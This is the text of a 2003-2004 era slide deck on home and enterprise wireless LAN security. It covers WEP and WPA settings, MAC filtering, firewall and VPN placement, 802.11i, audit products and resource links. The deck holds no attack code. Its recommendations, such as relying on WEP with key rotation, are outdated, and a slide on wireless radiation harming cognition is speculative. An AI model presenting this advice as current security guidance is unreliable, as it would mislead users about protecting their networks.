Authentication: prefer "Open System" plus encryption over "Shared Key"; Shared Key hands a keystream sample to anyone sniffing the challenge/response
Configure AP to enable MAC address filtering (not perfect, yes…)
Enable WEP/WPA
Bbbbut…isn’t WEP broken?
Yes, but…just because your front door can be
picked, doesn’t mean you shouldn’t lock it!
Never be low hanging fruit for attackers
If you just enable WEP more secure than 75%
of WLAN users (according to wardriving data)
If you enable WEP + change SSID from default
+ change AP logon/pw: more secure than 95%
of lusers
Enabling WEP
[screenshots: Orinoco Gold client on Win 98SE; Linksys WAP54G setup page, pic modified from http://www.timhiggins.com/Reviews/images/scrnshots/linksys_wap54g_setup.jpg]
Advanced WEP
Freeware key generators create pseudorandom
keys for you to enter
Rotate keys frequently (weekly for business,
monthly for home at minimum)
Make sure highest key-length WEP is enabled
(remember, 64 bit WEP key is really just 40 bits
long [thanks, marketing!])
Upgrade WEP to WPA as soon as possible (look
for WPA support for all new hardware)
Advanced WLAN Security: Topology Options
[diagram: "Safe Side" (internal network) | Firewall | "Unsafe Side" (Access Point, internet)]
Treat all wireless communication as insecure
Put AP on "unsafe" side of firewall
Use VPN (private tunnel) through internet to reach internal network
Impractical for SOHO networks (expensive; throughput hit)
Advanced WLAN Security Upgrades
802.1X port-based authentication: requires dedicated authentication server (or server process in AP)
RADIUS authentication: for enterprises only
IEEE 802.11i = WPA + RSN; currently in draft form
RSN: Robust Security Network = 802.1X + EAP + AES (non-WEP encryption protocol); will likely need hardware upgrade to run RSN without major hit on throughput; likely available in "mature" form in 2005-6 (world will be beta-testing 802.11i during 2004)
802.11i (excellent): http://www.commsdesign.com/design_library/cd/wl/OEG20021126S0003
802.11i (advanced): http://csrc.nist.gov/wireless/S10_802.11i%20Overview-jw1.pdf
RSN: http://www.nwfusion.com/news/tech/2003/0526techupdate.html
Future WLAN Security Issues
Biological hazards of radio communications
Military implementation of DOS vs. WLANs/cellular
Geographic extension of WLAN-- ablation of security
through propinquity (ELF; satellites with ultra-sensitive
sensors)
Legal aspects (HIPAA, due-diligence) and need to
implement security & audit for rogue APs, wardrivers
Follow-on Technologies: UltraWide Band (UWB), others
WLAN = Biohazard?
3G networks have been shown to affect cognition of
volunteers & create headaches, nausea
Interestingly, enhanced memory and alertness
As we become surrounded by WLANs, PANs, WANs,
and cellular broadcasting towers, are we harming our
fragile neurological systems?
No evolutionary exposure to MW radiation at current
levels…will our children’s children adapt?
http://edition.cnn.com/2003/TECH/ptech/10/01/g3.health.reut/index.html
Beware the Wolfpack
Small, autonomous sensor-jammers that intelligently coalesce into WLAN
on battlefield; 6 lb canisters initiate RF DOS within 500 meter radius
Link together to overpower enemy’s WLAN/cellular communications
Part of DARPA XG (Next Generation) RF dominance initiative
http://www.darpa.mil/DARPATech2002/presentations/ ato_pdf/speeches/MARSHALL.pdf
http://www.darpa.mil/ato/programs/wolfpack.htm
http://www.theregister.co.uk/content/69/32361.html
http://www.defenselink.mil/news/Aug2003/n08142003_200308147.html
Physician, Audit Thyself
Lots of commercial products out there to audit networks for rogue APs, P2P connections, wardrivers
May become legal requirement in future for HIPAA compliance (along with advanced security afforded by RSN/802.11i [final standard anticipated May 2004])
[pictured: AirMagnet Handheld PAK®]
http://www.airmagnet.com/products/handheld.htm
http://www.airdefense.net/products/index.html
http://www.wildpackets.com/products/airopeek
[diagram: summary callouts around the wireless network]
Assume wardrivers, snoopers all around you
Prevent theft; BIOS pw; encrypt sensitive files
Change default SSID; don't broadcast
Upgrade WEP ASAP: got WPA/802.1X?
Enable WEP; rotate keys manually
Change default admin logon/pw
802.1X, 802.11i, RSN; VPN + RADIUS for enterprises
Patch OS frequently to plug wireless security holes; read media for new WLAN exploits
The Tao of Network Security
1994-1999: Information Access
2000-2005: Information Denial
Online Resources
WLAN Specifications
•WiFiTM Alliance (formerly WECA): http://www.weca.net/
•IEEE 802.11: http://standards.ieee.org/getieee802/portfolio.html
•IEEE 802.11i: Latest draft (private): http://grouper.ieee.org/groups/802/11/private/Draft_Standards/11i/802.11i-D6.0.doc
Lots of interesting documents: http://www.ieee802.org/11/Documents/DocumentHolder/
•Bluetooth:
https://www.bluetooth.org/
•HIPERLAN/2: Official Specs: http://www.hiperlan2.com
IEEE Communications Overview: http://www.ihpffo.de/systems/Doc/Vorlesung/MC/ %DCbung/Gruppe7-Hiperlan/0130khun.pdf
•HiSWAN: http://www.arib.or.jp/mmac/e/index.htm
•Avian IP Transport Protocol (RFC 1149): http://www.ietf.org/rfc/rfc1149.txt?number=1149
Online Resources
Basic 802.11 Security
•WLAN Security FAQ (ISS): http://www.iss.net/wireless/WLAN_FAQ.php
•WEP Specifications: http://standards.ieee.org/getieee802/download/802.11-1999.pdf
•WEP Insecurity: http://www.cs.rice.edu/~astubble/wep/wep_attack.html
•WPA: http://www.weca.net/OpenSection/pdf/Wi-Fi_Protected_Access_Overview.pdf
•Wardriving: http://www.wardriving.com ; www.sans.org/rr/papers/68/174.pdf
•Netstumbler: http://www.netstumbler.com
•Wireless Glossary: http://www.devx.com/wireless/Door/11333
•Build your own Cantenna: http://www.turnpoint.net/wireless/cantennahowto.html
Online Resources
Advanced WLAN Security/Continuing Security Education
•SANS: http://www.sans.org
•Cool list of WLAN Security Links: http://is-it-true.org/pt/ptips23.shtml
•Google it: search Google for “WLAN security” and/or “WiFi® security”
•Still More whitepapers: http://www.wlana.org/learning_center.html
Online Resources
AFH Topics
•People are stupid: Wireless Equivalent Privacy:
http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Wireless+Equivalent+Privacy%22&btnG=Google+Search
•People are stupid 2: Wireless Encryption Protocol:
http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=%22Wireless+Encryption+Protocol%22
•HAARP: http://www.haarp.alaska.edu/haarp/ ; http://www.vs.afrl.af.mil/Factsheets/haarp.html
•ECHELON: http://www.europarl.eu.int/tempcom/echelon/ pdf/rapport_echelon_en.pdf
•TEMPEST: http://www.cwrl.utexas.edu/~benjamin/316kfall/316ktexts/tempest1.html
Offline Resources
Books/Articles: Computer Security Essentials
Skoudis, Ed, Counterhack, Upper Saddle River, NJ: Prentice
Hall PTR 2002. ISBN 0-13-033273-9 (amazing book! dozens of
black-hat techniques with countermeasures)
Cheswick WR, Bellovin SM, Firewalls and Internet Security:
Repelling the Wily Hacker, New York: Addison-Wesley
Publishing Company 1994. ISBN 0-201-63357-4 (a classic)
Chapman, D. Brent and Zwicky, Elizabeth D., Building
Internet Firewalls, Sebastopol, CA: O'Reilly & Associates, 1995.
ISBN 1-56592-124-0 (first edition includes excellent appendix
on basics of ISO/OSI TCP/IP stack)
Offline Resources
Books/Articles: WLAN Security
Duntemann J, Jeff Duntemann’s Drive-by WiFi Guide, Scottsdale:
Paraglyph Press, 2003. ISBN 1-932111-74-3 (very readable &
entertaining; most practical 3-space reference thus far)
Peikari C, Fogie S, Maximum Wireless Security, Indianapolis: Sams
Publishing, 2003. ISBN 0-672-32488-1 (contains some errors [er,
Wireless Equivalent Privacy? To paraphrase the song, 1/3 ain’t good.])
Edney J, Arbaugh WA, Real 802.11 Security: WiFi Protected Access
and 802.11i, Boston (etc.): Addison-Wesley, 2004 (cool time-travel
aspect of copyright [to make it seem more current]; almost
incomprehensible at times, but good reference)